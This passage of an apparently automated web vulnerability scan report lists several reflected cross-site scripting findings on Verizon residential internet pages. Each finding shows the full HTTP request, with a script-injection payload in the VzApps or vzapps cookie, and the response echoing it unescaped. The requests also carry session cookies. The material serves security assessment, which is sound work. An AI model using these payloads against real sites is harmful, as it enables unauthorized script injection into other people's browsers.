Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Overview/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX766fa<script>alert(1)</script>a298fe0ec53; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71922
Expires: Sat, 20 Nov 2010 03:23:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:23:13 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX766fa<script>alert(1)</script>a298fe0ec53; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX766FA<SCRIPT>ALERT(1)</SCRIPT>A298FE0EC53 </DIV>
...[SNIP]...

1.103. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Plans/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload e1d4d<script>alert(1)</script>f1881c1417d was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXe1d4d<script>alert(1)</script>f1881c1417d; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94418
Expires: Sat, 20 Nov 2010 03:14:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:48 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe1d4d<script>alert(1)</script>f1881c1417d; path=/
Set-Cookie: ContextInfo_Language=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE1D4D<SCRIPT>ALERT(1)</SCRIPT>F1881C1417D </DIV>
...[SNIP]...

1.104. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Plans/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 136fa'><script>alert(1)</script>a9a22c4e567 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX136fa'><script>alert(1)</script>a9a22c4e567; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94422
Expires: Sat, 20 Nov 2010 03:14:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX136fa'><script>alert(1)</script>a9a22c4e567; path=/
Set-Cookie: ContextInfo_Language=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX136FA'><SCRIPT>ALERT(1)</SCRIPT>A9A22C4E567 ' />
...[SNIP]...

1.105. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 50211<script>alert(1)</script>b0f40fbc4a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX50211<script>alert(1)</script>b0f40fbc4a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92840
Expires: Sat, 20 Nov 2010 00:13:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX50211<script>alert(1)</script>b0f40fbc4a; path=/
Set-Cookie: ContextInfo_Language=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX50211<SCRIPT>ALERT(1)</SCRIPT>B0F40FBC4A </DIV>
...[SNIP]...

1.106. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 134f1'><script>alert(1)</script>ef0109a6fac was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX134f1'><script>alert(1)</script>ef0109a6fac; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94442
Expires: Sat, 20 Nov 2010 00:13:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX134f1'><script>alert(1)</script>ef0109a6fac; path=/
Set-Cookie: ContextInfo_Language=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX134F1'><SCRIPT>ALERT(1)</SCRIPT>EF0109A6FAC ' />
...[SNIP]...

1.107. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Value/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d1ec'><script>alert(1)</script>5088e34c333 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX2d1ec'><script>alert(1)</script>5088e34c333; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; 